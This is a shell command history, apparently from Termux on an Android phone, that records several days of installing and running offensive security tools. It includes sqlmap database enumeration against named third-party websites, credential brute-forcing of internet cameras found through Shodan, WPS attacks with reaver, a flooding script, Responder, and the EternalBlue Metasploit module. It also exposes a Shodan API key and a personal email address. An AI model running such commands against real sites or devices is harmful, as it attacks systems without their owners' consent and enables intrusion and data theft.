  paths:
    - shodanwave.py
- cmd: python2 shodanwave.py 
  when: 1503515419
  paths:
    - shodanwave.py
- cmd: nano username.txt
  when: 1503515769
- cmd: nano pass.txt
  when: 1503515802
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k pFp7dy
  when: 1503515877
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: shodan
  when: 1503516109
- cmd: shodan search camera
  when: 1503516134
- cmd: ./pp.py
  when: 1503517014
- cmd: python pp.py
  when: 1503517021
  paths:
    - pp.py
- cmd: python2 pp.py
  when: 1503517139
  paths:
    - pp.py
- cmd: python2 pupysh.py 
  when: 1503517173
  paths:
    - pupysh.py
- cmd: git clone https://github.com/n1nj4sec/pupy.git pupy
  when: 1503517202
- cmd: cd pupy
  when: 1503517339
  paths:
    - pupy
- cmd: git clone  https://github.com/nil0x42/phpsploit
  when: 1503518107
- cmd: cd phpsploit/
  when: 1503518163
  paths:
    - phpsploit/
- cmd: ./phpsploit 
  when: 1503518171
- cmd: python phpsploit 
  when: 1503518177
  paths:
    - phpsploit
- cmd: python3 phpsploit 
  when: 1503518201
  paths:
    - phpsploit
- cmd: python2 phpsploit 
  when: 1503518208
  paths:
    - phpsploit
- cmd: rm -rf phpsploit/
  when: 1503518235
  paths:
    - phpsploit/
- cmd: git clone https://github.com/beefproject/beef
  when: 1503518242
- cmd: cd beef/
  when: 1503518304
  paths:
    - beef/
- cmd: ./beef 
  when: 1503518310
- cmd: gem install bundler & bundle install
  when: 1503518396
  paths:
    - install
    - install
- cmd: ruby beef 
  when: 1503518703
  paths:
    - beef
- cmd: rm -rf beef/
  when: 1503518724
  paths:
    - beef/
- cmd: pip install urlparse2
  when: 1503568952
- cmd: pip install six
  when: 1503574510
- cmd: pip install gnureadline
  when: 1503574915
- cmd: pkg install libsodium
  when: 1503590194
- cmd: pkg search libsodium
  when: 1503646264
- cmd: apt get update
  when: 1503646277
- cmd: pkg search clib
  when: 1503646358
- cmd: pip install libsodium
  when: 1503646369
- cmd: rm -rf /data/data/com.termux/files/usr/tmp/pip-build-d4cy9cup/PyNaCl/src/libsodium
  when: 1503646488
- cmd: exi5
  when: 1503646497
- cmd: pip install PyNaCl
  when: 1503646503
- cmd: pip instalp capstone
  when: 1503651183
- cmd: rm -rf /data/data/com.termux/files/usr/tmp/fish.u0_a1037
  when: 1503651857
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.u0_a1037
- cmd: chroot
  when: 1503651898
- cmd: pkg install proot
  when: 1503651939
- cmd: proot termux-chroot
  when: 1503651951
- cmd: pip install capstone
  when: 1503652311
- cmd: rm -rf pupy/
  when: 1503659251
  paths:
    - pupy/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/home/routersploit/
  when: 1503659782
  paths:
    - /data/data/com.termux/files/home/routersploit/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/home/routersploit/routersploit.log 
  when: 1503659788
  paths:
    - /data/data/com.termux/files/home/routersploit/routersploit.log
- cmd: atexit
  when: 1503659875
- cmd: pip install urlparse
  when: 1503659916
- cmd: pip2 install bbqsql
  when: 1503674878
- cmd: pip install chardet2
  when: 1503674971
- cmd: pip install bbqsql
  when: 1503675005
- cmd: pip install coros
  when: 1503675633
- cmd: pip2 install coros
  when: 1503675662
- cmd: nano /data/data/com.termux/files/usr/lib/python2.7/site-packages/bbqsql/lib/technique.py 
  when: 1503676474
  paths:
    - /data/data/com.termux/files/usr/lib/python2.7/site-packages/bbqsql/lib/technique.py
- cmd: nmap 192.168.0.101 -A
  when: 1503689428
- cmd: nmap -h
  when: 1503689443
- cmd: nmap 192.168.0.101 -sV
  when: 1503689482
- cmd: nmap 192.168.0.101 -O
  when: 1503689512
- cmd: bbqsql 
  when: 1503689862
- cmd: git clone https://github.com/JPaulMora/Pyrit
  when: 1503690276
- cmd: git clone https://www.google.am/url?sa=t&source=web&rct=j&url=https://github.com/hashcat/hashcat&ved=0ahUKEwiO6pz-kvPVAhWGOBoKHalHCe4QFggsMAE&usg=AFQjCNGxxKSgqZ7SI
  when: 1503690386
- cmd: git clone https://github.com/hashcat/hashcat
  when: 1503690413
- cmd: cd hashcat/
  when: 1503690583
  paths:
    - hashcat/
- cmd: ./example0.sh 
  when: 1503690612
- cmd: cd OpenCL/
  when: 1503690627
  paths:
    - OpenCL/
- cmd: cs ..
  when: 1503690644
  paths:
    - ..
- cmd: cd tools/
  when: 1503690665
  paths:
    - tools/
- cmd: ./ test.sh
  when: 1503690678
  paths:
    - test.sh
- cmd: ./test.sh
  when: 1503690689
- cmd: bash test.sh
  when: 1503690696
  paths:
    - test.sh
- cmd: rm -rf hashcat/
  when: 1503690843
  paths:
    - hashcat/
- cmd: py
  when: 1503690918
- cmd: rm -rf routersploit/
  when: 1503690936
  paths:
    - routersploit/
- cmd: git clone https://github.com/reverse-shell/routersploit
  when: 1503690952
- cmd: cd reaver-wps-fork-t6x/
  when: 1503691171
  paths:
    - reaver-wps-fork-t6x/
- cmd: ifconfig
  when: 1503691204
- cmd: ./reaver -i p2p0 -b 10:fe:ed:a3:8d:7a -vv
  when: 1503691221
- cmd: ./reaver -i wlan0 -b 10:fe:ed:a3:8d:7a -vv
  when: 1503691232
- cmd: python3 hammer.py -s 192.168.0.1 -p 80 -t 2
  when: 1503691264
  paths:
    - hammer.py
- cmd: pixiewps -h
  when: 1503691354
- cmd: wapiti -h
  when: 1503691409
- cmd: wapiti --start http://howtomakeall.esy.es
  when: 1503691463
- cmd: wapiti -shttp://howtomakeall.esy.es
  when: 1503691499
- cmd: wapiti -s http://howtomakeall.esy.es
  when: 1503691531
- cmd: git clone https://github.com/j91321/rext
  when: 1503715923
- cmd: cd rext/
  when: 1503715947
  paths:
    - rext/
- cmd: ./rext.py 
  when: 1503715954
- cmd: python rext.py 
  when: 1503715960
  paths:
    - rext.py
- cmd: git clone https://github.com/RUB-NDS/PRET
  when: 1503716772
- cmd: git clone https://github.com/leviathan-framework/leviathan
  when: 1503716854
- cmd: bash scripts/debian_install.sh
  when: 1503716886
  paths:
    - scripts/debian_install.sh
- cmd: python leviathan.py 
  when: 1503717799
  paths:
    - leviathan.py
- cmd: cd PRET/
  when: 1503718095
  paths:
    - PRET/
- cmd: python2 pcl.py 
  when: 1503718102
  paths:
    - pcl.py
- cmd: python2 pret.py 
  when: 1503718108
  paths:
    - pret.py
- cmd: rm -rf PRET/
  when: 1503718134
  paths:
    - PRET/
- cmd: git clone https://github.com/Gallopsled/pwntools
  when: 1503718381
- cmd: cd pwntools/
  when: 1503718613
  paths:
    - pwntools/
- cmd: chmod 700 setup.py 
  when: 1503718642
  paths:
    - setup.py
- cmd: ./setup.py
  when: 1503718647
- cmd: rm -rf pwntools/
  when: 1503719236
  paths:
    - pwntools/
- cmd: termux-fix-shebang 
  when: 1503719272
- cmd: git clone https://github.com/commixproject/commix
  when: 1503719309
- cmd: python commix.py 
  when: 1503719360
  paths:
    - commix.py
- cmd: python2 commix.py 
  when: 1503719366
  paths:
    - commix.py
- cmd: python2 commix.py -h
  when: 1503719392
  paths:
    - commix.py
- cmd: git clone https://github.com/vulnersCom/getsploit
  when: 1503719742
- cmd: python getsploit.py 
  when: 1503719765
  paths:
    - getsploit.py
- cmd: python getsploit.py http
  when: 1503719784
  paths:
    - getsploit.py
- cmd: python getsploit.py TP-Link
  when: 1503719829
  paths:
    - getsploit.py
- cmd: python getsploit.py Xiaomi Redmi 4
  when: 1503719864
  paths:
    - getsploit.py
- cmd: python getsploit.py Xiaomi Redmi
  when: 1503719871
  paths:
    - getsploit.py
- cmd: python getsploit.py Samsung
  when: 1503719883
  paths:
    - getsploit.py
- cmd: git clone https://github.com/k4m4/kickthemout
  when: 1503720313
- cmd: chmod 700 kickthemout.py 
  when: 1503720335
  paths:
    - kickthemout.py
- cmd: python kickthemout.py 
  when: 1503720345
  paths:
    - kickthemout.py
- cmd: git clone https://github.com/Ganapati/Crawlic
  when: 1503722124
- cmd: ./crawlic.py 
  when: 1503722154
- cmd: python crawlic.py 
  when: 1503722162
  paths:
    - crawlic.py
- cmd: python2 crawlic.py 
  when: 1503722168
  paths:
    - crawlic.py
- cmd: python2 crawlic.py -u https://howtomakeall.esy.es
  when: 1503722204
  paths:
    - crawlic.py
- cmd: git clone https://github.com/AlisamTechnology/ATSCAN
  when: 1503722327
- cmd: cd ATSCAN/
  when: 1503722429
  paths:
    - ATSCAN/
- cmd: chmod +x ./install.sh 
  when: 1503722434
  paths:
    - ./install.sh
- cmd: ./install.sh 
  when: 1503722443
- cmd: bash install.sh 
  when: 1503722448
  paths:
    - install.sh
- cmd: atscan
  when: 1503722610
- cmd: chmod 700 atscan.pl 
  when: 1503722637
  paths:
    - atscan.pl
- cmd: ./atscan.pl 
  when: 1503722642
- cmd: perl atscan.pl 
  when: 1503722646
  paths:
    - atscan.pl
- cmd: cd inc/
  when: 1503722669
  paths:
    - inc/
- cmd: Installed Tool Execution: atscan.pl 
  when: 1503722753
  paths:
    - atscan.pl
- cmd: cpan&gt; install URI::Escape
  when: 1503722879
- cmd: rm -rf ATSCAN/
  when: 1503722969
  paths:
    - ATSCAN/
- cmd: rm -rf License.txt 
  when: 1503722993
  paths:
    - License.txt
- cmd: rm -rf atscan.pl 
  when: 1503722999
  paths:
    - atscan.pl
- cmd: rm -rf inc/
  when: 1503723005
  paths:
    - inc/
- cmd: git clone https://github.com/AzizDammak/DorkScan
  when: 1503723146
- cmd: cd DorkScan/
  when: 1503723151
  paths:
    - DorkScan/
- cmd: chmod 700 scanner.py 
  when: 1503723162
  paths:
    - scanner.py
- cmd: ./scanner.py 
  when: 1503723166
- cmd: python2 scanner.py 
  when: 1503723184
  paths:
    - scanner.py
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/python3.6/site-packages/XlsxWriter-0.9.8.dist-info/
  when: 1503723278
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/XlsxWriter-0.9.8.dist-info/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/python3.6/site-packages/
  when: 1503723303
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/
- cmd: pip install docopt
  when: 1503723310
- cmd: python scanner.py 
  when: 1503723335
  paths:
    - scanner.py
- cmd: python scanner.py -h
  when: 1503723348
  paths:
    - scanner.py
- cmd: python scanner.py inurl:*.php?pg= 5
  when: 1503723434
  paths:
    - scanner.py
- cmd: python scanner.py inurl:*.php?pg= 
  when: 1503723446
  paths:
    - scanner.py
- cmd: rm -rf DorkScan/
  when: 1503723457
  paths:
    - DorkScan/
- cmd: pkg inatall sqlmap
  when: 1503723793
- cmd: sqlmap
  when: 1503723801
- cmd: nano Programms 
  when: 1503723810
  paths:
    - Programms
- cmd: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
  when: 1503724177
- cmd: python sqlmap.py -h
  when: 1503724245
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -h
  when: 1503724255
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -u http://yaroslavl.ecologyandculture.ru/index.php?id=34 -dbms
  when: 1503724400
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -u http://yaroslavl.ecologyandculture.ru/index.php?id=34 --dbms
  when: 1503724425
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -u http://yaroslavl.ecologyandculture.ru/index.php?id=34 --dbs
  when: 1503724512
  paths:
    - sqlmap.py
- cmd: cd sqlmap-dev/
  when: 1503725087
  paths:
    - sqlmap-dev/
- cmd: python2 sqlmap.py -u "http://yaroslavl.ecologyandculture.ru/index.php?id=34" --dbs
  when: 1503725089
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -u "http://www.pixelpirategames.com/games.php?id=2" --dbss
  when: 1503725204
  paths:
    - sqlmap.py
- cmd: python2 sqlmap.py -u "http://www.pixelpirategames.com/games.php?id=2" --dbs
  when: 1503725212
  paths:
    - sqlmap.py
- cmd: proot
  when: 1503728986
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/home/.msf4
  when: 1503731608
  paths:
    - /data/data/com.termux/files/home/.msf4
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/ruby/
  when: 1503731827
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/ruby/2.4.0
  when: 1503731842
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/2.4.0
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/ruby
  when: 1503731846
  paths:
    - /data/data/com.termux/files/usr/lib/ruby
- cmd: pkg install -y termux-elf-cleaner
  when: 1503740506
- cmd: gem install rb-readline
  when: 1503740661
- cmd: git clone https://github.com/cyrus-and/zizzania
  when: 1503741435
- cmd: pkg install scons
  when: 1503741569
- cmd: git clone https://github.com/seemoo-lab/nexmon/tree/master/firmwares/bcm4339
  when: 1503766860
- cmd: wget https://github.com/seemoo-lab/nexmon/tree/master/firmwares/bcm4339
  when: 1503766873
- cmd: wget https://github.com/seemoo-lab/nexmon/tree/master/firmwares/bcm4339/
  when: 1503766889
- cmd: git clone https://github.com/seemoo-lab/nexmon
  when: 1503766912
- cmd: rm -rf bcm4339 
  when: 1503766956
  paths:
    - bcm4339
- cmd: rm -rf index.html 
  when: 1503766962
  paths:
    - index.html
- cmd: ./Makefile 
  when: 1503767007
- cmd: git clone https://github.com/jh00nbr/Routerhunter-2.0
  when: 1503779039
- cmd: ld
  when: 1503779133
- cmd: cd zizzania/
  when: 1503779145
  paths:
    - zizzania/
- cmd: pkg search scons
  when: 1503779275
- cmd: pip install scons
  when: 1503779285
- cmd: pip3 install scons
  when: 1503779313
- cmd: pip2 install scons
  when: 1503779342
- cmd: pkg search libpcap
  when: 1503779369
- cmd: pkg search uthash
  when: 1503779393
- cmd: mkdir -p deps/uthash/
  when: 1503779417
- cmd: pushd deps/uthash/
  when: 1503779431
  paths:
    - deps/uthash/
- cmd: wget https://raw.githubusercontent.com/troydhanson/uthash/master/src/uthash.h\npopd
  when: 1503779443
- cmd: scoms
  when: 1503779462
- cmd: scons
  when: 1503779466
- cmd: pip2 uninstall scons
  when: 1503779557
- cmd: rm -rf zizzania/
  when: 1503779600
  paths:
    - zizzania/
- cmd: cd commix/
  when: 1503779605
  paths:
    - commix/
- cmd: python2 commix.py
  when: 1503779610
  paths:
    - commix.py
- cmd: cd kickthemout/
  when: 1503779655
  paths:
    - kickthemout/
- cmd: python2 kickthemout.py 
  when: 1503779668
  paths:
    - kickthemout.py
- cmd: rm -rf kickthemout/
  when: 1503779831
  paths:
    - kickthemout/
- cmd: cd hammer/
  when: 1503779844
  paths:
    - hammer/
- cmd: rm -rf hammer/
  when: 1503779853
  paths:
    - hammer/
- cmd: cd Crawlic/
  when: 1503779860
  paths:
    - Crawlic/
- cmd: python2 crawlic.py
  when: 1503779868
  paths:
    - crawlic.py
- cmd: rm -rf wpspin/
  when: 1503779944
  paths:
    - wpspin/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/home/metasploit-framework
  when: 1503780684
  paths:
    - /data/data/com.termux/files/home/metasploit-framework
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/home/metasploit-framework/lib
  when: 1503780697
  paths:
    - /data/data/com.termux/files/home/metasploit-framework/lib
- cmd: python2 shodanwave.py -h
  when: 1503808196
  paths:
    - shodanwave.py
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK -s -t
  when: 1503808246
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK -s Netwave IP Camera -t
  when: 1503808301
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK -s Netwave IP Camera -t output.txt
  when: 1503808314
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK -s Netwave IP Camera
  when: 1503808322
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: pkg search urllib
  when: 1503808422
- cmd: pkg search url
  when: 1503808430
- cmd: pip search urllib
  when: 1503808443
- cmd: pip2 install urllib3
  when: 1503808493
- cmd: pip install urllib3
  when: 1503808518
- cmd: pip2 install yieldfrom.urllin3
  when: 1503808559
- cmd: pip2 install yieldfrom.urllib3
  when: 1503808567
- cmd: python2 shodanwave.py -s Camera -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK
  when: 1503808596
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: pkg search networksearch
  when: 1503808632
- cmd: python shodanwave.py -h
  when: 1503808783
  paths:
    - shodanwave.py
- cmd: pip search NetworkSearch
  when: 1503808941
- cmd: pip search NetworkSearchhosts
  when: 1503808961
- cmd: pip2 install NetworkSearchosts
  when: 1503808989
- cmd: pip install -r requirements.txt
  when: 1503809043
  paths:
    - requirements.txt
- cmd: shodan -h
  when: 1503809669
- cmd: shodan --scan 192.168.0.1
  when: 1503809715
- cmd: shodan scan 192.168.0.1
  when: 1503809768
- cmd: shodan scan -h
  when: 1503809801
- cmd: shodan search -h
  when: 1503809838
- cmd: shodan search --limit INTEGER 5 --separator TEXT Ip Camera
  when: 1503809939
- cmd: shodan search --limit 5 --separator Ip Camera
  when: 1503810035
- cmd: shodan init 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK search --limit 5 --separator Ip Camera
  when: 1503810140
- cmd: shodan init 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK search --separator Ip Camera
  when: 1503810157
- cmd: shodan init 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK search
  when: 1503810169
- cmd: shodan search --limit 5 --separator Ip Camera 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK
  when: 1503810207
- cmd: git clone https://github.com/fbctf/shodanwave
  when: 1503810924
- cmd: cd shodanwave/
  when: 1503810930
  paths:
    - shodanwave/
- cmd: pip2 install urllib2
  when: 1503810939
- cmd: python2 shodanwave.py -u username.txt -w pass.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK
  when: 1503811025
  paths:
    - shodanwave.py
    - username.txt
    - pass.txt
- cmd: nano us.txt
  when: 1503811039
- cmd: nano pas.txt
  when: 1503811070
- cmd: python2 shodanwave.py -u us.txt -w pas.txt -k 5wKXrRbTMDM3bhuEx76lVmHpH3Sz1ozK
  when: 1503811149
  paths:
    - shodanwave.py
    - us.txt
    - pas.txt
- cmd: nmap 192.168.0.1/24
  when: 1503811855
- cmd: git config --global armen12@gmail.com "Deathlive"
  when: 1503819915
  paths:
    - config
- cmd: git config --global armen1298@gmail.com "Deathlive"
  when: 1503819927
  paths:
    - config
- cmd: git config --global user.name "Deathlive"
  when: 1503820006
  paths:
    - config
- cmd: git config --global user.email "armen1298@gmail.com"
  when: 1503820050
  paths:
    - config
- cmd: gem install grpc
  when: 1503820778
- cmd: ruby msfupdate 
  when: 1503820973
  paths:
    - msfupdate
- cmd: pkg install libsodium-dev
  when: 1503825959
- cmd: termux-fix-shebang ./vendor/libsodium/configure ./vendor/libsodium/build-aux/*
  when: 1503826187
  paths:
    - ./vendor/libsodium/configure
- cmd: nano rbnacl-libsodium.gemspec 
  when: 1503826202
  paths:
    - rbnacl-libsodium.gemspec
- cmd: nano configure 
  when: 1503826380
  paths:
    - configure
- cmd: gem install build rbnacl-libsodium.gemspec 
  when: 1503826636
  paths:
    - rbnacl-libsodium.gemspec
- cmd: cd ./vendor/libsodium/
  when: 1503826719
  paths:
    - ./vendor/libsodium/
- cmd: cd ../..
  when: 1503826949
  paths:
    - ../..
- cmd: gem build rbnacl-libsodium.gemspec 
  when: 1503826977
  paths:
    - rbnacl-libsodium.gemspec
- cmd: gem install rbnacl-libsodium-1.0.13.gem 
  when: 1503827020
- cmd: gem install rbnacl-libsodium-1.0.11.gem 
  when: 1503827036
  paths:
    - rbnacl-libsodium-1.0.11.gem
- cmd: rm -rf metasploit-framework/
  when: 1503827582
  paths:
    - metasploit-framework/
- cmd: git clone https://github.com/timwr/metasploit-framework --depth 1
  when: 1503827792
- cmd: gem bundler
  when: 1503828234
- cmd: gem install bundler
  when: 1503828270
- cmd: gem install nokogiri -- --use-system-libraries
  when: 1503828376
- cmd: gem unpack network_interface
  when: 1503828537
- cmd: cd network_interface-0.0.1/
  when: 1503828568
  paths:
    - network_interface-0.0.1/
- cmd: sed 's|git ls-files|find -type f|' -i network_interface.gemspec
  when: 1503828570
  paths:
    - network_interface.gemspec
- cmd: curl -L https://wiki.termux.com/images/6/6b/Netifaces.patch -o netifaces.patch
  when: 1503828581
- cmd: patch -p1 < netifaces.patch
  when: 1503828597
- cmd: gem build network_interface.gemspec
  when: 1503828608
  paths:
    - network_interface.gemspec
- cmd: gem install network_interface-0.0.1.gem
  when: 1503828619
  paths:
    - network_interface-0.0.1.gem
- cmd: rm -rf network_interface-0.0.1/
  when: 1503828689
  paths:
    - network_interface-0.0.1/
- cmd: gem unpack grpc -v 1.4.1
  when: 1503828710
- cmd: bundle install -j5
  when: 1503829007
- cmd: $PREFIX/bin/find -type f -executable -exec termux-fix-shebang {} ;
  when: 1503829117
- cmd: gem unpack rbnacl-libsodium
  when: 1503829526
- cmd: cd rbnacl-libsodium-1.0.11/
  when: 1503829539
  paths:
    - rbnacl-libsodium-1.0.11/
- cmd: cd vendor/libsodium/
  when: 1503829546
  paths:
    - vendor/libsodium/
- cmd: nano +2334 configure
  when: 1503829549
  paths:
    - configure
- cmd: rm -rf rbnacl-libsodium-1.0.11/
  when: 1503829606
  paths:
    - rbnacl-libsodium-1.0.11/
- cmd: gem uninstall rb-readline
  when: 1503829943
- cmd: nano Gemfile 
  when: 1503829982
  paths:
    - Gemfile
- cmd: git clone https://github.com/ElevenPaths/Eternal-Doublepulser-Metasploit.git
  when: 1503836476
- cmd: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulser-Metasploit.git
  when: 1503836593
- cmd: git clone https://github.com/UltimateHackers/ReconDog
  when: 1503837954
- cmd: git clone https://github.com/zanyarjamal/Datasploit
  when: 1503838092
- cmd: chmod -R 777 Datasploit
  when: 1503838159
- cmd: python config.pyc 
  when: 1503838183
  paths:
    - config.pyc
- cmd: python domain_censys.py 
  when: 1503838196
  paths:
    - domain_censys.py
- cmd: pip2 install -r requirements.txt
  when: 1503838204
  paths:
    - requirements.txt
- cmd: mv config_sample.py config.py
  when: 1503839129
  paths:
    - config_sample.py
- cmd: python config.py
  when: 1503839157
  paths:
    - config.py
- cmd: python2 config.py
  when: 1503839163
  paths:
    - config.py
- cmd: git clone https://github.com/lgandX/Responder
  when: 1503840980
- cmd: cd Responder/
  when: 1503841002
  paths:
    - Responder/
- cmd: python Responder.py
  when: 1503841013
  paths:
    - Responder.py
- cmd: python2 Responder.py
  when: 1503841020
  paths:
    - Responder.py
- cmd: python2 Responder.py -I wlan0
  when: 1503841040
  paths:
    - Responder.py
- cmd: cs
  when: 1503841592
- cmd: chmod 777 dog.py 
  when: 1503842958
  paths:
    - dog.py
- cmd: python dog.py 
  when: 1503842965
  paths:
    - dog.py
- cmd: python2 emailOsint.py
  when: 1503845522
  paths:
    - emailOsint.py
- cmd: python2 emailOsint.py -h
  when: 1503845590
  paths:
    - emailOsint.py
- cmd: python emailOsint.py -h
  when: 1503845595
  paths:
    - emailOsint.py
- cmd: pip2 install tweepy
  when: 1503845671
- cmd: mv Eternalblue-Doublepulsar-Metasploit metasploit-framework/
  when: 1503845949
  paths:
    - Eternalblue-Doublepulsar-Metasploit
    - metasploit-framework/
- cmd: la
  when: 1503845955
- cmd: rm -rf rext/
  when: 1503845978
  paths:
    - rext/
- cmd: rm -rf shodanwave/
  when: 1503845985
  paths:
    - shodanwave/
- cmd: nmap 192.168.0.101
  when: 1503851146
- cmd: nmap 192.168.0.0/24
  when: 1503851186
- cmd: ls 
  when: 1503854099
- cmd: nano config.py 
  when: 1503854108
  paths:
    - config.py
- cmd: pkg upgrade
  when: 1503992044
- cmd: rm -rt .msf4/
  when: 1503992950
  paths:
    - .msf4/
- cmd: rm -rf .msfdb/
  when: 1503992962
  paths:
    - .msfdb/
- cmd: rm -rf .msf4/
  when: 1503992968
  paths:
    - .msf4/
- cmd: cd .penetrator/
  when: 1503992985
  paths:
    - .penetrator/
- cmd: rm -rf .penetrator/
  when: 1503992995
  paths:
    - .penetrator/
- cmd: mkdir ~/.msfdb
  when: 1503993218
- cmd: initdb ~/.msfdb
  when: 1503993224
- cmd: git pull
  when: 1503996369
- cmd: cd Datasploit/
  when: 1503996395
  paths:
    - Datasploit/
- cmd: python2 usernameOsint.py -h
  when: 1503996403
  paths:
    - usernameOsint.py
- cmd: python usernameOsint.py -h
  when: 1503996411
  paths:
    - usernameOsint.py
- cmd: python2 usernameOsint.py
  when: 1503996423
  paths:
    - usernameOsint.py
- cmd: python usernameOsint.py
  when: 1503996431
  paths:
    - usernameOsint.py
- cmd: pip2 install datasploit
  when: 1503996445
- cmd: datasploit -h
  when: 1503996503
- cmd: pip2 install datasploit.py
  when: 1503996515
  paths:
    - datasploit.py
- cmd: datasploit 
  when: 1503996528
- cmd: cd getsploit/
  when: 1503996544
  paths:
    - getsploit/
- cmd: rm -rt getsploit/
  when: 1503996560
  paths:
    - getsploit/
- cmd: rm -rf getsploit/
  when: 1503996567
  paths:
    - getsploit/
- cmd: rm -rf Crawlic/
  when: 1503996580
  paths:
    - Crawlic/
- cmd: rm -rf commix/
  when: 1503996586
  paths:
    - commix/
- cmd: cd leviathan/
  when: 1503996601
  paths:
    - leviathan/
- cmd: python2 leviathan.py 
  when: 1503996606
  paths:
    - leviathan.py
- cmd: python2 dog.py 
  when: 1503996667
  paths:
    - dog.py
- cmd: git clone https://github.com/rpef
  when: 1503996949
- cmd: git clone https://github.com/mncoppola/rpef
  when: 1503996965
- cmd: cd rpef/
  when: 1503996998
  paths:
    - rpef/
- cmd: python rpef.py 
  when: 1503997008
  paths:
    - rpef.py
- cmd: python2 rpef.py 
  when: 1503997012
  paths:
    - rpef.py
- cmd: python2 rpef.py -h
  when: 1503997020
  paths:
    - rpef.py
- cmd: python2 rpef.py -ll
  when: 1503997043
  paths:
    - rpef.py
- cmd: rm -rf rpef/
  when: 1503997087
  paths:
    - rpef/
- cmd: git clone https://github.com/sh1nu11bi/Routerhunter-2.0
  when: 1503997119
- cmd: cd Routerhunter-2.0/
  when: 1503997130
  paths:
    - Routerhunter-2.0/
- cmd: chmod 777 routerhunter.py 
  when: 1503997142
  paths:
    - routerhunter.py
- cmd: python routerhunter.py -h
  when: 1503997149
  paths:
    - routerhunter.py
- cmd: python2 routerhunter.py -h
  when: 1503997155
  paths:
    - routerhunter.py
- cmd: python2 routerhunter.py -range 192.168.0.1
  when: 1503997314
  paths:
    - routerhunter.py
- cmd: python2 routerhunter.py -range 192.168.0.1-255
  when: 1503997331
  paths:
    - routerhunter.py
- cmd: rm -rf Routerhunter-2.0/
  when: 1503997342
  paths:
    - Routerhunter-2.0/
- cmd: ls ReconDog/
  when: 1503998046
  paths:
    - ReconDog/
- cmd: cd ReconDog/
  when: 1503998076
  paths:
    - ReconDog/
- cmd: rm -rf Datasploit
  when: 1503998081
- cmd: datasploit_config 
  when: 1503998150
- cmd: pip uninstall datasploit
  when: 1503998296
- cmd: pip2 uninstall datasploit
  when: 1503998340
- cmd: pkg install ncdu
  when: 1503999015
- cmd: cd metasploit-framework/
  when: 1504021619
  paths:
    - metasploit-framework/
- cmd: cd S
  when: 1504291181
- cmd: sed 's|grpc (.*|grpc (1.4.1)|g' -i Gemfile.lock
  when: 1504291498
  paths:
    - Gemfile.lock
- cmd: cd grpc-1.4.1
  when: 1504291522
  paths:
    - grpc-1.4.1
- cmd: curl -LO https://raw.githubusercontent.com/grpc/grpc/v1.4.1/grpc.gemspec
  when: 1504291560
- cmd: curl -L https://wiki.termux.com/images/b/bf/Grpc_extconf.patch -o extconf.patch
  when: 1504291587
- cmd: patch -p1 < extconf.patch
  when: 1504291616
- cmd: gem build grpc.gemspec
  when: 1504291647
  paths:
    - grpc.gemspec
- cmd: gem install grpc-1.4.1.gem
  when: 1504291715
  paths:
    - grpc-1.4.1.gem
- cmd: rm -rf grpc-1.4.1/
  when: 1504291885
  paths:
    - grpc-1.4.1/
- cmd: $PREFIX/bin/find -type f -executable -exec termux-fix-shebang \\{\\} \\;
  when: 1504291903
- cmd: zsh
  when: 1504291907
- cmd: nano +218 Gemfile.lock
  when: 1504292098
  paths:
    - Gemfile.lock
- cmd: nano +232 Gemfile.lock
  when: 1504292131
  paths:
    - Gemfile.lock
- cmd: nano +244 Gemfile.lock
  when: 1504292155
  paths:
    - Gemfile.lock
- cmd: nano +266 Gemfile.lock
  when: 1504292179
  paths:
    - Gemfile.lock
- cmd: cd prog/
  when: 1504292227
  paths:
    - prog/
- cmd: nano msfstart.sh
  when: 1504292236
  paths:
    - msfstart.sh
- cmd: nano msf.sh 
  when: 1504292259
  paths:
    - msf.sh
- cmd: 1
  when: 1504292937
- cmd: 33
  when: 1504292945
- cmd: bash start.sh
  when: 1504292977
  paths:
    - start.sh
- cmd: cd script/
  when: 1504293028
  paths:
    - script/
- cmd: nano bonus.sh 
  when: 1504293032
  paths:
    - bonus.sh
- cmd: ./dnschef.py -h
  when: 1504293083
